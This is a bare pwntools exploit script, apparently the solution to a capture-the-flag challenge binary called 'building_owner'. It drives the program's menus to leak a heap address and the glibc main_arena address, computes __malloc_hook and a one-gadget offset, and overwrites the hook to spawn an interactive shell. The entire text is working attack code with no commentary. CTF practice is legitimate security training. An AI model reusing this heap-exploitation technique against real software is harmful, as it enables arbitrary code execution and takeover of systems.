from pwn import *

binary='./building_owner'
s=process('./building_owner')
e=ELF(binary)

s.recvuntil("> ")
s.sendline("1")
s.recvuntil('name?')
s.sendline("komad")
s.recvuntil('apartment?')
s.sendline("1")
s.recvuntil('floor?')
s.sendline("1")
s.recvuntil(': ')
s.sendline("abcdefgh")

s.recvuntil('> ')
s.sendline('1')
s.recvuntil('name? ')
s.sendline("a"*0x1600)
s.recvuntil('apartment? ')
s.sendline("1")
s.recvuntil('floor? ')
s.sendline("1")
s.recvuntil(': ')
s.sendline("1234")

s.recvuntil('> ')
s.sendline('4')
s.recvuntil('> ')
s.sendline('2')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('2')
s.recvuntil('> ')
s.sendline('4')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('3')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('price of menu : ')
leak = int(s.recvuntil('\n')[:-1])
log.info('leak : ' + hex(leak))
s.recvuntil('> ')
s.sendline('6')
s.recvuntil('menu : ')
s.sendline(str(leak-0x1e70))
s.recvuntil('> ')
s.sendline('9')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('1. ')
main_arena = u64(s.recv(6).ljust(8, '\x00'))
malloc_hook = main_arena - 0x68
log.info('malloc_hook : '+hex(malloc_hook))
oneshot = main_arena-0x2D48D4
s.sendline('4')
s.recvuntil('> ')
s.sendline('3')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('6')
s.recvuntil('menu : ')
s.sendline(str(malloc_hook))
s.recvuntil('> ')
s.sendline('-1')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('> ')
s.sendline('1')
s.recvuntil('new name : ')
s.sendline(p64(int(oneshot)))
s.recvuntil('> ')
s.sendline('-1')
s.recvuntil('> ')
s.sendline('-1')
s.recvuntil('> ')
s.sendline('-1')
s.recvuntil('> ')
s.sendline('5')
s.interactive()

